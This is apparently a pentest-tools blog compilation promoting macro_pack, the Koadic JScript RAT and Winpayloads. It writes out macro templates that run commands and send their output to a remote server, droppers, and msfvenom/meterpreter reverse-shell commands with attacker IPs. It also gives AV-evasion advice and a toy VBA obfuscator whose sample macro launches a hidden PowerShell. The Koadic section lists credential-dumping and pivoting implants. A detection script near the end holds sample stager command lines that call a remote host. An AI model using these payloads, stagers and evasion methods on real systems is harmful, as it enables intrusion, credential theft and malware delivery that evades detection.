-T, --trojan=OUTPUT_FILE_PATH   Inject the macro into an existing MS Office file. Supported files are the same as for the -G option. Files will also be converted to the appropriate format, ex: pres.pptx becomes pres.pptm. If the file does not exist, it will be created (like the -G option).
--stealth       Anti-debug and hiding features.
--dcom=REMOTE_FILE_PATH   Open a remote document using DCOM, for pivoting or remote execution when psexec is not possible, for example. This triggers AutoOpen/Workbook_Open automatically. If there is no auto-start function, use the --start-function option to indicate which macro to run.

Template usage

Templates can be called using -t, --template=TEMPLATE_NAME combined with other options. Here are all the available templates.

HELLO
Just prints a hello message and a macro-awareness notice.
Give this template the name or email of the author.
-> Example: echo "@Author" | macro_pack.exe -t HELLO -G hello.pptm

CMD
Executes a command line and sends the result to a remote HTTP server.
Give this template the server URL and the command to run.
-> Example: echo "http://192.168.0.5:7777" "dir /Q C:" | macro_pack.exe -t CMD -o -G cmd.doc
# Catch the result with any web server or with netcat
nc -l -p 7777

DROPPER
Downloads and executes a file.
Give this template the file URL and the target file path.
-> Example: echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER -o -G dropper.xls

DROPPER2
Downloads and executes a file. File attributes are also set to system, read-only and hidden.
Give this template the file URL and the target file path.
-> Example: echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER2 -o -G dropper.xlsm

DROPPER_PS
Downloads and executes a PowerShell script using rundll32 (to bypass a blocked powershell.exe).
Note: this payload will download PowerShdll from GitHub.
Give this template the URL of the PowerShell script you want to run.
-> Example: echo "<powershell_script_url>" | macro_pack.exe -t DROPPER_PS -o -G powpow.doc

DROPPER_DLL
Downloads a DLL with another extension and runs it using Office VBA.
-> Example, load a meterpreter DLL using Office:
REM Generate meterpreter dll payload
msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f dll -o meter.dll
REM Make it available on a webserver, ex using netcat on port 6666
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat meter.dll; } | nc -l -p 6666 -q1
REM Create the Office file which will download the DLL and call it
REM The DLL URL is http://192.168.0.5:6666/normal.html and it will be saved as an .asd file
echo "http://192.168.0.5:6666/normal.html" Run | macro_pack.exe -t DROPPER_DLL -o -G meterdll.xls

METERPRETER
Meterpreter reverse TCP template using MacroMeter by Cn33liz.
This template is a C# Meterpreter stager built by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.
Give this template the IP and PORT of the listening msfconsole.
-> Example: echo <ip> <port> | macro_pack.exe -t METERPRETER -o -G meter.docm
Recommended msfconsole options (use exploit/multi/handler):
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT <port>
set AutoRunScript post/windows/manage/migrate
set EXITFUNC thread
set ExitOnSession false
set EnableUnicodeEncoding true
set EnableStageEncoding true
exploit -j

WEBMETER
Meterpreter reverse HTTPS template using VbsMeter by Cn33liz (see the recommended payloads below).
This template is a C# Meterpreter stager built by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.
Give this template the IP and PORT of the listening msfconsole.
-> Example: echo <ip> <port> | macro_pack.exe -t WEBMETER -o -G meter.vsd
Recommended msfconsole options (use exploit/multi/handler):
set PAYLOAD windows/meterpreter/reverse_https (32bit)
set PAYLOAD windows/x64/meterpreter/reverse_https (64bit)
set AutoRunScript post/windows/manage/migrate
set LHOST <ip>
set LPORT <port>
set EXITFUNC thread
set ExitOnSession false
set EnableUnicodeEncoding true
set EnableStageEncoding true
exploit -j

EMBED_EXE
Combined with the --embed option, it will drop and execute (hidden) the embedded file.
Optionally you can give the template the path where the file should be extracted. If no extraction path is given, the file will be extracted under a random name in the current path.
-> Example1: macro_pack.exe -t EMBED_EXE --embed=%%windir%%\system32\calc.exe -o -G my_calc.vbs
-> Example2: echo "path\\to\newcalc.exe" | macro_pack.exe -t EMBED_EXE --embed=%%windir%%\system32\calc.exe -o -G my_calc.doc

Efficiency

The various features were tested against locally installed antimalware solutions as well as online services. I ran multiple tests with several kinds of payloads and macro_pack features. A majority of antivirus products will be evaded by the simple "obfuscate" option. Features available in Pro mode generally ensure full AV bypass.

Example with the Empire VBA stager:
Here are the results of the NoDistribute scanner for the regular Empire VBA stager
Here are the results with the macro_pack -o (--obfuscate) option

Warning: do not submit your samples to online scanners (ex VirusTotal); it is the best way to break your stealth macro. I also suggest you do not submit to non-reporting sites such as NoDistribute. You cannot be sure what these sites will do with the data you submit. If you have an issue with macro_pack AV detection you can write to us for advice or submit an issue or pull request.

Relevant resources

Blog posts about MS Office security:
http://blog.sevagas.com/?My-VBA-Bot (write a full VBA RAT, includes how to bypass VBOM protection)
http://pwndizzle.blogspot.fr/2017/03/office-document-macros-ole-actions-dde.html
https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ (about Dynamic Data Exchange attacks)
https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/

Other useful links:
https://github.com/p3nt4/PowerShdll (run PowerShell with DLLs only)
https://gist.github.com/vivami/03780dd512fec22f3a2bae49f9023384 (run a PowerShell script with the PowerShdll VBA implementation)
https://enigma0x3.net/2016/03/15/phishing-with-empire/ (generate an Empire VBA payload)
https://github.com/EmpireProject/Empire
https://medium.com/@vivami/phishing-between-the-app-whitelists-1b7dcdab4279
https://www.metasploit.com/
https://github.com/Cn33liz/MacroMeter
https://github.com/khr0x40sh/MacroShop

Download macro_pack
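The Efficiency section above claims that the plain "obfuscate" option defeats most signature-based scanners. To make the mechanism concrete, here is a toy VBA obfuscator written for this page. It is example code, not macro_pack's own obfuscator (whose algorithm the page does not describe): it renames user-defined procedures, parameters and Dim variables with random identifiers and rewrites every string literal as a Chr()/ChrW() concatenation, so that neither the procedure names nor the command string a signature keys on survive in the module. The SAMPLE_VBA macro is constructed for the example. The one check worth noticing is the AUTOSTART set: Office finds AutoOpen, Workbook_Open and friends by name, so an obfuscator that renames them silently disables the document.

```python
"""Toy VBA obfuscator: rename user-defined names, Chr()-encode string literals.
Example code added to this page; it is NOT macro_pack's implementation and only
illustrates the class of transformation that defeats simple signature matching.
Deliberate limitations: comment lines are not parsed, and `Dim a, b` only
renames `a`."""
import random
import re
import string

# Constructed sample macro (not from the page): the string literal is the kind
# of thing a signature-based scanner keys on.
SAMPLE_VBA = '''Sub AutoOpen()
    Dim cmd As String
    cmd = "powershell -nop -w hidden -c calc.exe"
    RunIt cmd
End Sub

Sub RunIt(payload As String)
    Shell payload, vbHide
End Sub
'''

# Office looks these up by name to auto-run the macro: renaming them would
# silently disable the document, so they are never touched.
AUTOSTART = {"autoopen", "auto_open", "autoexec", "autoclose", "auto_close",
             "document_open", "document_close", "workbook_open", "workbook_close"}

STRING_RE = re.compile(r'"(?:[^"\n]|"")*"')   # VBA escapes " by doubling it
PROC_RE = re.compile(r"\b(?:Sub|Function)\s+([A-Za-z_]\w*)\s*\(([^)]*)\)", re.I)
DIM_RE = re.compile(r"\bDim\s+([A-Za-z_]\w*)", re.I)


def collect_names(src):
    """Lower-cased procedure, parameter and Dim names that are safe to rename."""
    names = set()
    for m in PROC_RE.finditer(src):
        if m.group(1).lower() not in AUTOSTART:
            names.add(m.group(1).lower())
        for param in m.group(2).split(","):
            words = [w for w in param.split() if w.lower() not in ("byval", "byref", "optional")]
            if words:
                names.add(words[0].lower())
    for m in DIM_RE.finditer(src):
        names.add(m.group(1).lower())
    return names


def chr_encode(literal):
    """'"abc"' -> '(Chr(97) & Chr(98) & Chr(99))'; ChrW for code points above 255."""
    inner = literal[1:-1].replace('""', '"')
    if not inner:
        return '""'
    parts = ["%s(%d)" % ("Chr" if ord(c) < 256 else "ChrW", ord(c)) for c in inner]
    return "(" + " & ".join(parts) + ")"


def _fresh_ident(rng, used):
    """Random 8-12 character identifier that has not been handed out yet."""
    while True:
        ident = rng.choice(string.ascii_letters) + "".join(
            rng.choice(string.ascii_letters + string.digits) for _ in range(rng.randint(7, 11)))
        if ident.lower() not in used:
            used.add(ident.lower())
            return ident


def obfuscate(src, seed=0):
    """Rename identifiers outside string literals, Chr()-encode the literals.
    VBA is case-insensitive, so the rename map is keyed on lower-case names."""
    rng = random.Random(seed)
    used = set()
    mapping = {n: _fresh_ident(rng, used) for n in sorted(collect_names(src))}
    ident_re = re.compile(r"\b(" + "|".join(map(re.escape, mapping)) + r")\b", re.I) if mapping else None

    def rename(code):
        return code if ident_re is None else ident_re.sub(lambda m: mapping[m.group(1).lower()], code)

    out, pos = [], 0
    for m in STRING_RE.finditer(src):      # code segments and literals alternate
        out.append(rename(src[pos:m.start()]))
        out.append(chr_encode(m.group(0)))
        pos = m.end()
    out.append(rename(src[pos:]))
    return "".join(out)


if __name__ == "__main__":
    print(obfuscate(SAMPLE_VBA, seed=1))
```

The output still contains "Shell", "vbHide" and "AutoOpen", which is the point a defender should take from this: names and literals are cheap to mutate, while the behaviour (an auto-start procedure that ends in Shell, a script host or a download) is what a detection has to key on.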

Link: http://feedproxy.google.com/~r/PentestTools/~3/L18DQzXLRXo/macropack-tool-used-to-automatize.html

Koadic – COM Command & Control Framework (JScript RAT)

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

It is possible to serve payloads completely in memory from stage 0 onward, as well as to use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

Koadic also attempts to be compatible with both Python 2 and Python 3.

Demo
- Hooks a zombie
- Elevates integrity (UAC bypass)
- Dumps the SAM/SECURITY hives for passwords
- Scans the local network for open SMB
- Pivots to another machine

Stagers

Stagers hook target zombies and allow you to use implants.

Module | Description
stager/js/mshta | serves payloads in memory using MSHTA.exe HTML Applications
stager/js/regsvr | serves payloads in memory using regsvr32.exe COM+ scriptlets
stager/js/rundll32_js | serves payloads in memory using rundll32.exe
stager/js/disk | serves payloads using files on disk

Implants

Implants start jobs on zombies.

Module | Description
implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8 and 10.
implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10.
implant/fun/zombie | Maxes the volume and opens The Cranberries on YouTube in a hidden window.
implant/fun/voice | Plays a message over text-to-speech.
implant/gather/clipboard | Retrieves the current content of the user clipboard.
implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive.
implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file.
implant/inject/mimikatz_dynwrapx | Injects a reflectively loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
implant/inject/mimikatz_dotnet2js | Injects a reflectively loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
implant/inject/shellcode_excel | Runs an arbitrary shellcode payload (if Excel is installed).
implant/manage/enable_rdesktop | Enables remote desktop on the target.
implant/manage/exec_cmd | Runs an arbitrary command on the target, and optionally receives the output.
implant/pivot/stage_wmi | Hooks a zombie on another machine using WMI.
implant/pivot/exec_psexec | Runs a command on another machine using psexec from Sysinternals.
implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie's LAN.
implant/utils/download_file | Downloads a file from the target zombie.
implant/utils/upload_file | Uploads a file from the listening server to the target zombies.

Disclaimer

Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.

Creators
@Aleph___Naught
@The_Naterz
@JennaMagius
@zerosum0x0

Contributors
@vvalien1
fbctf
cclaus
Arno0x
delirious-lettuce

Acknowledgements

Special thanks to research done by the following individuals:
@subTee
@enigma0x3
@tiraniddo
@harmj0y
@gentilkiwi
@mattifestation
clymb3r

Download Koadic
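The three in-memory stagers in the table above all launch a signed Windows script host with a command line that points at remote or inline script, which is exactly the shape a process-creation rule can key on without knowing the URL. The following detection sketch is example code added to this page, not part of Koadic: it runs three such rules over constructed process-creation events (timestamp, image, parent image, command line, the fields a Sysmon event ID 1 or a 4688 record with command-line auditing carries) and raises the severity when the parent is an Office process, the macro-delivery case. The rules match the launch pattern (a URL or javascript:/vbscript: for mshta, the /i:http scriptlet form with scrobj.dll for regsvr32, javascript: for rundll32), so a local .hta or a vendor DLL registration does not fire. The disk stager (stager/js/disk) writes files and is not covered by these rules.

```python
"""Process-creation rules for script-host stagers (mshta HTA, regsvr32 COM+
scriptlet, rundll32 JavaScript).  Example code added to this page, not part of
Koadic; the events below are constructed, not captured.
Fields: timestamp|image|parent_image|command_line"""
import re
from dataclasses import dataclass

SAMPLE_LOG = """\
2018-01-10T09:00:01|C:\\Windows\\System32\\mshta.exe|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|mshta http://10.0.0.5:9999/ABCDEF
2018-01-10T09:00:02|C:\\Windows\\System32\\regsvr32.exe|C:\\Windows\\explorer.exe|regsvr32 /s /n /u /i:http://10.0.0.5:9999/ABCDEF scrobj.dll
2018-01-10T09:00:03|C:\\Windows\\System32\\rundll32.exe|C:\\Windows\\System32\\cmd.exe|rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta http://10.0.0.5:9999/XYZ")
2018-01-10T09:00:04|C:\\Windows\\System32\\regsvr32.exe|C:\\Windows\\System32\\msiexec.exe|regsvr32 /s C:\\Program Files\\Vendor\\vendor.dll
2018-01-10T09:00:05|C:\\Windows\\System32\\mshta.exe|C:\\Windows\\explorer.exe|mshta C:\\Users\\alice\\AppData\\Local\\Temp\\install.hta
"""

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "visio.exe")

# (rule name, image regex, command-line regex).  Each matches the launch shape
# of the stager, not a URL or hostname, since those change per campaign.
RULES = [
    ("mshta_remote_or_inline", re.compile(r"\\mshta\.exe$", re.I),
     re.compile(r"https?://|javascript:|vbscript:", re.I)),
    ("regsvr32_scriptlet", re.compile(r"\\regsvr32\.exe$", re.I),
     re.compile(r"[/-]i:\S*https?://|scrobj\.dll", re.I)),
    ("rundll32_javascript", re.compile(r"\\rundll32\.exe$", re.I),
     re.compile(r"javascript:", re.I)),
]


@dataclass
class Alert:
    ts: str
    rule: str
    severity: str
    cmdline: str


def parse_event(line):
    """Split one pipe-delimited record; the command line may itself contain '|'-free text only."""
    ts, image, parent, cmdline = line.split("|", 3)
    return ts, image, parent, cmdline


def evaluate(ts, image, parent, cmdline):
    """Return an Alert for the first matching rule, or None."""
    for name, image_re, cmd_re in RULES:
        if image_re.search(image) and cmd_re.search(cmdline):
            # A script host spawned by an Office process is the macro-delivery case.
            sev = "high" if parent.lower().endswith(OFFICE_PARENTS) else "medium"
            return Alert(ts, name, sev, cmdline)
    return None


def scan(log_text):
    alerts = []
    for line in log_text.splitlines():
        if line.strip():
            alert = evaluate(*parse_event(line))
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a.ts, a.severity, a.rule, a.cmdline)
```

Events 4 and 5 (a vendor DLL registration and a local .hta launched from Explorer) produce no alert; local HTA files deserve their own rule with a different false-positive budget, which is why they are kept out of this one.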

Link: http://feedproxy.google.com/~r/PentestTools/~3/4r9r5eiQR9E/koadic-com-command-control-framework.html

Winpayloads – Undetectable Windows Payload Generation

Winpayloads is a payload generator tool that uses Metasploit's meterpreter shellcode, injects the user's IP and port into the shellcode and writes a Python file that executes the shellcode using ctypes. This is then AES-encrypted and compiled to a Windows executable using PyInstaller.

Main features:
- Undetectable Windows payload generation
- Easy-to-use GUI
- Upload payload to local web server
- Psexec payload to target machine
- Automatically runs a Metasploit listener with the correct settings after the payload is generated

Winpayloads also comes with a few features such as UAC bypass and payload persistence. These are PowerShell files that execute on the system when the meterpreter gets a reverse shell. The UAC bypass is written by PowerShellEmpire and uses an exploit to bypass UAC on local administrator accounts, creating a reverse meterpreter running as local administrator back to the attacker's machine.

Winpayloads can also set up a SimpleHTTPServer to put the payload on the network so it can be downloaded on the target machine, and it has a psexec feature that will execute the payload on the target machine if supplied with usernames, domain, passwords or hashes.

psexec.py – impacket example

Features
- UACBypass – PowerShellEmpire https://github.com/PowerShellEmpire/Empire/raw/master/data/module_source/privesc/Invoke-BypassUAC.ps1 Copyright (c) 2015, Will Schroeder and Justin Warner. All rights reserved.
- PowerUp – PowerShellEmpire https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 Copyright (c) 2015, Will Schroeder and Justin Warner. All rights reserved.
- Invoke-Shellcode https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 Copyright (c) 2012, Matthew Graeber. All rights reserved.
- Invoke-Mimikatz https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1 Copyright (c) 2012, Matthew Graeber. All rights reserved.
- Invoke-EventVwrBypass https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 Matt Nelson (@enigma0x3)
- Persistence – adds payload persistence on reboot
- Psexec Spray – sprays hashes until a connection succeeds, then psexecs the payload on the target
- Upload to local web server – easy deployment
- PowerShell stager – allows invoking payloads in memory & more

Getting Started
git clone https://github.com/nccgroup/winpayloads.git
cd winpayloads
./setup.sh will set up everything needed for Winpayloads
Start Winpayloads: ./Winpayloads.py
Type 'help' or '?' to get a detailed help page
setup.sh -r will reinstall

Download Winpayloads

Link: http://feedproxy.google.com/~r/PentestTools/~3/jpBeM5iD4g4/winpayloads-undetectable-windows.html